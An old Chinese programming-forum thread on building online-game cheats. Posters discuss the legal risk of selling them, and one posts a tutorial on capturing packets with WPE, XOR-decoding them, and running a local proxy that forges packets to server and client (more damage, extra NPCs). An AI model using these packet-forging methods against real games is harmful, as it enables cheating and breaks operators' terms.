呵呵,谁说作外挂的抓不住啊????没听说作奇迹外挂的好几个都被端了老窝了,早就判了!!!! 你的消息也太不灵通了!!!!至于象传奇那样一向对外挂疲软的网游,是不会真正查杀外挂的. 你要是真的想作外挂,并且要卖的话,劝你小心啊!!弄不好是要判的啊!!!至于你说的什么国外帐号等等,根本没那必要!!!! 来自: shopman, 时间: 2004-01-23 22:43:00, ID: 2421706   奇迹那事知道，这也难怪别人! 奇迹人物坐标信息没在服务器上所以大有空子可钻，这的确算得上是破坏游戏平衡性。 像传奇不要看外挂N多恶性的却奇少几乎没有。 一方面真想做个外挂卖，二方面也练练手。 就是这样。 来自: lizhuo255, 时间: 2004-01-23 22:52:00, ID: 2421711   呵呵,作外挂也挺有赚头的,只不过风险太大拉,万一哪天网游一翻脸,呵呵.......... 作外挂的都有一套自己的策划,制作,市场调查和销售的人员.你不会是想自己单干吧??? 呵呵,不过还是劝你要谨慎啊!!! 好了,还有什么可以帮忙的???要是没有的话,是不是应该给点辛苦分啊,尽管没帮上你什么忙!!! 来自: shopman, 时间: 2004-01-23 22:59:00, ID: 2421714   要多少？？？说吧。 来自: lizhuo255, 时间: 2004-01-23 23:00:00, ID: 2421715   啊??? 50~100是不是多了??? 呵呵,要是没什么可以帮你的,你就看着给吧!!!! 呵呵,猴年大吉,恭喜发财啊!!! 来自: lizhuo255, 时间: 2004-01-23 23:05:00, ID: 2421716   老大,没想到,你居然有6000多分啊!!!![

]哈哈,可碰到大富翁了!!!! 来自: shopman, 时间: 2004-01-24 0:42:00, ID: 2421745   呵呵，，，都是朋友!!!!你也是我朋友!!!! 来自: Poseidon, 时间: 2004-01-26 13:56:00, ID: 2422868   原理就是: 欺上(服务器)瞒下(客户端)! 来自: Poseidon, 时间: 2004-01-26 13:57:00, ID: 2422869   也不是什么高深的技术! 只是分析数据包比较困难. 来自: Poseidon, 时间: 2004-01-26 14:49:00, ID: 2422894   在进行我们的工作之前，我们需要掌握一些关于计算机中储存数据方式的知识和游戏中储存数据的特点。本章节是提供给菜鸟级的玩家看的，如果你是高手就可以跳过了，呵呵！　　如果，你想成为无坚不摧的剑客，那么，这些东西就会花掉你一些时间；如果，你只想作个江湖的游客的话，那么这些东西，了解与否无关紧要。是作剑客，还是作游客，你选择吧！ 现在我们开始！首先，你要知道游戏中储存数据的几种格式，这几种格式是：字节(BYTE)、字(WORD)和双字(DOUBLE WORD)，或者说是8位、16位和32位储存方式。字节也就是8位方式能储存0~255的数字；字或说是16位储存方式能储存0~65535的数；双字即32位方式能储存0~4294967295的数。 为何要了解这些知识呢？在游戏中各种参数的最大值是不同的，有些可能100左右就够了，比如，金庸群侠传中的角色的等级、随机遇敌个数等等。而有些却需要大于255甚至大于65535，象金庸群侠传中角色的金钱值可达到数百万。所以，在游戏中各种不同的数据的类型是不一样的。在我们修改游戏时需要寻找准备修改的数据的封包，在这种时候，正确判断数据的类型是迅速找到正确地址的重要条件。 　　在计算机中数据以字节为基本的储存单位，每个字节被赋予一个编号，以确定各自的位置。这个编号我们就称为地址。 在需要用到字或双字时，计算机用连续的两个字节来组成一个字，连续的两个字组成一个双字。而一个字或双字的地址就是它们的低位字节的地址。现在我们常用的Windows 9x操作系统中，地址是用一个32位的二进制数表示的。而在平时我们用到内存地址时，总是用一个8位的16进制数来表示它。 二进制和十六进制又是怎样一回事呢？ 　　简单说来，二进制数就是一种只有0和1两个数码，每满2则进一位的计数进位法。同样，16进制就是每满十六就进一位的计数进位法。16进制有0--F十六个数字，它为表示十到十五的数字采用了A、B、C、D、E、F六个数字，它们和十进制的对应关系是：A对应于10，B对应于11，C对应于12，D对应于13，E对应于14，F对应于15。而且，16进制数和二进制数间有一个简单的对应关系，那就是；四位二进制数相当于一位16进制数。比如，一个四位的二进制数1111就相当于16进制的F，1010就相当于A。 了解这些基础知识对修改游戏有着很大的帮助，下面我就要谈到这个问题。由于在计算机中数据是以二进制的方式储存的，同时16进制数和二进制间的转换关系十分简单，所以大部分的修改工具在显示计算机中的数据时会显示16进制的代码，而且在你修改时也需要输入16进制的数字。你清楚了吧？ 　　在游戏中看到的数据可都是十进制的，在要寻找并修改参数的值时，可以使用Windows提供的计算器来进行十进制和16进制的换算，我们可以在开始菜单里的程序组中的附件中找到它。 　　现在要了解的知识也差不多了！不过，有个问题在游戏修改中是需要注意的。在计算机中数据的储存方式一般是低位数储存在低位字节，高位数储存在高位字节。比如，十进制数41715转换为16进制的数为A2F3，但在计算机中这个数被存为F3A2。 看了以上内容大家对数据的存贮和数据的对应关系都了解了吗？好了，接下来我们要告诉大家在游戏中，封包到底是怎么一回事了，来！大家把袖口卷起来，让我们来干活吧！ -------------------------------------------------------------------------------- 二：什么是封包？ 怎么截获一个游戏的封包？怎么去检查游戏服务器的ip地址和端口号？ Internet用户使用的各种信息服务，其通讯的信息最终均可以归结为以IP包为单位的信息传送，IP包除了包括要传送的数据信息外，还包含有信息要发送到的目的IP地址、信息发送的源IP地址、以及一些相关的控制信息。当一台路由器收到一个IP数据包时，它将根据数据包中的目的IP地址项查找路由表，根据查找的结果将此IP数据包送往对应端口。下一台IP路由器收到此数据包后继续转发，直至发到目的地。路由器之间可以通过路由协议来进行路由信息的交换，从而更新路由表。 那么我们所关心的内容只是IP包中的数据信息，我们可以使用许多监听网络的工具来截获客户端与服务器之间的交换数据，下面就向你介绍其中的一种工具：WPE。 WPE使用方法：执行WPE会有下列几项功能可选择： SELECT GAME选择目前在记忆体中您想拦截的程式，您只需双击该程式名称即可。 TRACE追踪功能。用来追踪撷取程式送收的封包。WPE必须先完成点选欲追踪的程式名称，才可以使用此项目。按下Play键开始撷取程式收送的封包。您可以随时按下 | | 暂停追踪，想继续时请再按下 | | 。按下正方形可以停止撷取封包并且显示所有已撷取封包内容。若您没按下正方形停止键，追踪的动作将依照OPTION里的设定值自动停止。如果您没有撷取到资料，试试将OPTION里调整为Winsock Version 2。WPE 及 Trainers 是设定在显示至少16 bits 颜色下才可执行。 FILTER过滤功能。用来分析所撷取到的封包，并且予以修改。 SEND PACKET送出封包功能。能够让您送出假造的封包。 TRAINER MAKER制作修改器。 OPTIONS设定功能。让您调整WPE的一些设定值。 FILTER的详细教学 - 当FILTER在启动状态时，ON的按钮会呈现红色。- 当您启动FILTER时，您随时可以关闭这个视窗。FILTER将会保留在原来的状态，直到您再按一次 on / off 钮。- 只有FILTER启用钮在OFF的状态下，才可以勾选Filter前的方框来编辑修改。- 当您想编辑某个Filter，只要双击该Filter的名字即可。 NORMAL MODE： 范例： 当您在 Street Fighter Online ﹝快打旋风线上版﹞游戏中，您使用了两次火球而且击中了对方，这时您会撷取到以下的封包：SEND-> 0000 08 14 21 06 01 04 SEND-> 0000 02 09 87 00 67 FF A4 AA 11 22 00 00 00 00 SEND-> 0000 03 84 11 09 11 09 SEND-> 0000 0A 09 C1 10 00 00 FF 52 44 SEND-> 0000 0A 09 C1 10 00 00 66 52 44 您的第一个火球让对方减了16滴﹝16 = 10h﹞的生命值，而您观察到第4跟第5个封包的位置4有10h的值出现，应该就是这里了。 您观察10h前的0A 09 C1在两个封包中都没改变，可见得这3个数值是发出火球的关键。 因此您将0A 09 C1 10填在搜寻列﹝SEARCH﹞，然后在修改列﹝MODIFY﹞的位置4填上FF。如此一来，当您再度发出火球时，FF会取代之前的10，也就是攻击力为255的火球了！ ADVANCED MODE： 范例：当您在一个游戏中，您不想要用真实姓名，您想用修改过的假名传送给对方。在您使用TRACE后，您会发现有些封包里面有您的名字出现。假设您的名字是Shadow，换算成16进位则是﹝53 68 61 64 6F 77﹞；而您打算用moon﹝6D 6F 6F 6E 20 20﹞来取代他。1) SEND-> 0000 08 14 21 06 01 042) SEND-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05 3) SEND-> 0000 03 84 11 09 11 094) SEND-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11 5) SEND-> 0000 0A 09 C1 10 00 00 66 52 44 但是您仔细看，您的名字在每个封包中并不是出现在相同的位置上 - 在第2个封包里，名字是出现在第4个位置上- 在第4个封包里，名字是出现在第6个位置上 在这种情况下，您就需要使用ADVANCED MODE- 您在搜寻列﹝SEARCH﹞填上：53 68 61 64 6F 77 ﹝请务必从位置1开始填﹞- 您想要从原来名字Shadow的第一个字母开始置换新名字，因此您要选择从数值被发现的位置开始替代连续数值﹝from the position of the chain found﹞。- 现在，在修改列﹝MODIFY﹞000的位置填上：6D 6F 6F 6E 20 20 ﹝此为相对应位置，也就是从原来搜寻栏的+001位置开始递换﹞- 如果您想从封包的第一个位置就修改数值，请选择﹝from the beginning of the packet﹞ 了解一点TCP/IP协议常识的人都知道，互联网是将信息数据打包之后再传送出去的。每个数据包分为头部信息和数据信息两部分。头部信息包括数据包的发送地址和到达地址等。数据信息包括我们在游戏中相关操作的各项信息。那么在做截获封包的过程之前我们先要知道游戏服务器的IP地址和端口号等各种信息，实际上最简单的是看看我们游戏目录下，是否有一个SERVER.INI的配置文件，这个文件里你可以查看到个游戏服务器的IP地址，比如金庸群侠传就是如此，那么除了这个我们还可以在DOS下使用NETSTAT这个命令， NETSTAT命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。或者你可以使用木马客星等工具来查看网络连接。工具是很多的，看你喜欢用哪一种了。 NETSTAT命令的一般格式为：NETSTAT [选项] 命令中各选项的含义如下：-a 显示所有socket，包括正在监听的。-c 每隔1秒就重新显示一遍，直到用户中断它。-i 显示所有网络接口的信息。-n 以网络IP地址代替名称，显示出网络连接情形。-r 显示核心路由表，格式同"route -e"。-t 显示TCP协议的连接情况。-u 显示UDP协议的连接情况。-v 显示正在进行的工作。 来自: Poseidon, 时间: 2004-01-26 14:50:00, ID: 2422896   三：怎么来分析我们截获的封包？ 首先我们将WPE截获的封包保存为文本文件，然后打开它，这时会看到如下的数据（这里我们以金庸群侠传里PK店小二客户端发送的数据为例来讲解）： 第一个文件：SEND-> 0000 E6 56 0D 22 7E 6B E4 17 13 13 12 13 12 13 67 1BSEND-> 0010 17 12 DD 34 12 12 12 12 17 12 0E 12 12 12 9BSEND-> 0000 E6 56 1E F1 29 06 17 12 3B 0E 17 1ASEND-> 0000 E6 56 1B C0 68 12 12 12 5ASEND-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12SEND-> 0000 E6 56 17 C9 12 第二个文件：SEND-> 0000 83 33 68 47 1B 0E 81 72 76 76 77 76 77 76 02 7ESEND-> 0010 72 77 07 1C 77 77 77 77 72 77 72 77 77 77 6DSEND-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3SEND-> 0000 83 33 7E A5 21 77 77 77 3FSEND-> 0000 83 33 67 AD 76 CF 1B 0E 81 72 75 50 42 76 77 77SEND-> 0000 83 33 72 AC 77 我们发现两次PK店小二的数据格式一样，但是内容却不相同，我们是PK的同一个NPC，为什么会不同呢？原来金庸群侠传的封包是经过了加密运算才在网路上传输的，那么我们面临的问题就是如何将密文解密成明文再分析了。 因为一般的数据包加密都是异或运算，所以这里先讲一下什么是异或。简单的说，异或就是"相同为0，不同为1"（这是针对二进制按位来讲的），举个例子，0001和0010异或，我们按位对比，得到异或结果是0011，计算的方法是：0001的第4位为0，0010的第4位为0，它们相同，则异或结果的第4位按照"相同为0，不同为1"的原则得到0，0001的第3位为0，0010的第3位为0，则异或结果的第3位得到0，0001的第2位为0，0010的第2位为1，则异或结果的第2位得到1，0001的第1位为1，0010的第1位为0，则异或结果的第1位得到1，组合起来就是0011。异或运算今后会遇到很多，大家可以先熟悉熟悉，熟练了对分析很有帮助的。 下面我们继续看看上面的两个文件，按照常理，数据包的数据不会全部都有值的，游戏开发时会预留一些字节空间来便于日后的扩充，也就是说数据包里会存在一些"00"的字节，观察上面的文件，我们会发现文件一里很多"12"，文件二里很多"77"，那么这是不是代表我们说的"00"呢？推理到这里，我们就开始行动吧！ 我们把文件一与"12"异或，文件二与"77"异或，当然用手算很费事，我们使用"M2M 1.0 加密封包分析工具"来计算就方便多了。得到下面的结果： 第一个文件：1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 892 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 083 SEND-> 0000 F4 44 09 D2 7A 00 00 00 484 SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 005 SEND-> 0000 F4 44 05 DB 00 第二个文件：1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 70 6B 00 00 00 00 05 00 05 00 00 00 1A2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 843 SEND-> 0000 F4 44 09 D2 56 00 00 00 484 SEND-> 0000 F4 44 10 DA 01 B8 6C 79 F6 05 02 27 35 01 00 005 SEND-> 0000 F4 44 05 DB 00 哈，这一下两个文件大部分都一样啦，说明我们的推理是正确的，上面就是我们需要的明文！ 接下来就是搞清楚一些关键的字节所代表的含义，这就需要截获大量的数据来分析。 首先我们会发现每个数据包都是"F4 44"开头，第3个字节是变化的，但是变化很有规律。我们来看看各个包的长度，发现什么没有？对了，第3个字节就是包的长度！通过截获大量的数据包，我们判断第4个字节代表指令，也就是说客户端告诉服务器进行的是什么操作。例如向服务器请求战斗指令为"30"，战斗中移动指令为"D4"等。接下来，我们就需要分析一下上面第一个包"F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 89"，在这个包里包含什么信息呢？应该有通知服务器你PK的哪个NPC吧，我们就先来找找这个店小二的代码在什么地方。我们再PK一个小喽罗（就是大理客栈外的那个咯）：SEND-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 8A 19 00 00 00 00 11 00 02 00 00 00 C0 我们根据常理分析，游戏里的NPC种类虽然不会超过65535（FFFF），但开发时不会把自己限制在字的范围，那样不利于游戏的扩充，所以我们在双字里看看。通过"店小二"和"小喽罗"两个包的对比，我们把目标放在"6C 79 F6 05"和"CF 26 00 00"上。（对比一下很容易的，但你不能太迟钝咯，呵呵）我们再看看后面的包，在后面的包里应该还会出现NPC的代码，比如移动的包，游戏允许观战，服务器必然需要知道NPC的移动坐标，再广播给观战的其他玩家。在后面第4个包"SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"里我们又看到了"6C 79 F6 05"，初步断定店小二的代码就是它了！（这分析里边包含了很多工作的，大家可以用WPE截下数据来自己分析分析） 第一个包的分析暂时就到这里（里面还有的信息我们暂时不需要完全清楚了） 我们看看第4个包"SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"，再截获PK黄狗的包，（狗会出来2只哦）看看包的格式：SEND-> 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00SEND-> 0010 EB 03 F8 05 02 27 36 01 00 00 根据上面的分析，黄狗的代码为"4B 7D F6 05"（100040011），不过两只黄狗服务器怎样分辨呢？看看"EB 03 F8 05"（100140011），是上一个代码加上100000，呵呵，这样服务器就可以认出两只黄狗了。我们再通过野外遇敌截获的数据包来证实，果然如此。 那么，这个包的格式应该比较清楚了：第3个字节为包的长度，"DA"为指令，第5个字节为NPC个数，从第7个字节开始的10个字节代表一个NPC的信息，多一个NPC就多10个字节来表示。 大家如果玩过网金，必然知道随机遇敌有时会出现增援，我们就利用游戏这个增援来让每次战斗都会出现增援的NPC吧。 通过在战斗中出现增援截获的数据包，我们会发现服务器端发送了这样一个包：F4 44 12 E9 EB 03 F8 05 02 00 00 03 00 00 00 00 00 00 第5-第8个字节为增援NPC的代码（这里我们就简单的以黄狗的代码来举例）。那么，我们就利用单机代理技术来同时欺骗客户端和服务器吧！ 好了，呼叫NPC的工作到这里算是完成了一小半，接下来的事情，怎样修改封包和发送封包，我们下节继续讲解吧。 -------------------------------------------------------------------------------- 四：怎么冒充"客户端"向"服务器"发我们需要的封包？ 这里我们需要使用一个工具，它位于客户端和服务器端之间，它的工作就是进行数据包的接收和转发，这个工具我们称为代理。如果代理的工作单纯就是接收和转发的话，这就毫无意义了，但是请注意：所有的数据包都要通过它来传输，这里的意义就重大了。我们可以分析接收到的数据包，或者直接转发，或者修改后转发，或者压住不转发，甚至伪造我们需要的封包来发送。 下面我们继续讲怎样来同时欺骗服务器和客户端，也就是修改封包和伪造封包。通过我们上节的分析，我们已经知道了打多个NPC的封包格式，那么我们就动手吧！ 首先我们要查找客户端发送的包，找到战斗的特征，就是请求战斗的第1个包，我们找"F4 44 1F 30"这个特征，这是不会改变的，当然是要解密后来查找哦。找到后，表示客户端在向服务器请求战斗，我们不动这个包，转发。继续向下查找，这时需要查找的特征码不太好办，我们先查找"DA"，这是客户端发送NPC信息的数据包的指令，那么可能其他包也有"DA"，没关系，我们看前3个字节有没有"F4 44"就行了。找到后，我们的工作就开始了！ 我们确定要打的NPC数量。这个数量不能很大，原因在于网金的封包长度用一个字节表示，那么一个包可以有255个字节，我们上面分析过，增加一个NPC要增加10个字节，所以大家算算就知道，打20个NPC比较合适。 然后我们要把客户端原来的NPC代码分析计算出来，因为增加的NPC代码要加上100000哦。再把我们增加的NPC代码计算出来，并且组合成新的封包，注意代表包长度的字节要修改啊，然后转发到服务器，这一步在编写程序的时候要注意算法，不要造成较大延迟。 上面我们欺骗服务器端完成了，欺骗客户端就简单了，^-^ 发送了上面的封包后，我们根据新增NPC代码构造封包马上发给客户端，格式就是"F4 44 12 E9 NPC代码 02 00 00 03 00 00 00 00 00 00",把每个新增的NPC都构造这样一个包，按顺序连在一起发送给客户端，客户端也就被我们骗过了，很简单吧。 以后战斗中其他的事我们就不管了，尽情地开打吧，呵呵 来自: shopman, 时间: 2004-01-26 17:09:00, ID: 2422978   这篇文章是用wpe改封包现在来说没什么实际意义了，封包本身是经过了简单的编码同时 重要数据都不会用封包传送，改封包意义不太。 还是得逆向分析找出封包生成过程和接收封包的解析过程。 问题讨论没有结束 ...

得到QQ斗地主记牌器的所需内存值(200分)

eire

Unregistered / Unconfirmed

Ekin

Unregistered / Unconfirmed

hardware007

Unregistered / Unconfirmed

ivy1982

Unregistered / Unconfirmed

delfier

Unregistered / Unconfirmed

qdlover

Unregistered / Unconfirmed

jsjxuwenjun

Unregistered / Unconfirmed

超级牛X

Unregistered / Unconfirmed

SeekMyself

Unregistered / Unconfirmed

llaaddoo

Unregistered / Unconfirmed

fenian

Unregistered / Unconfirmed

st52

Unregistered / Unconfirmed

jenhon

Unregistered / Unconfirmed

eire

Unregistered / Unconfirmed

人在昆明

Unregistered / Unconfirmed

weiliu

Unregistered / Unconfirmed

weiliu

Unregistered / Unconfirmed

eire

Unregistered / Unconfirmed

weiliu

Unregistered / Unconfirmed

weiliu

Unregistered / Unconfirmed

Similar threads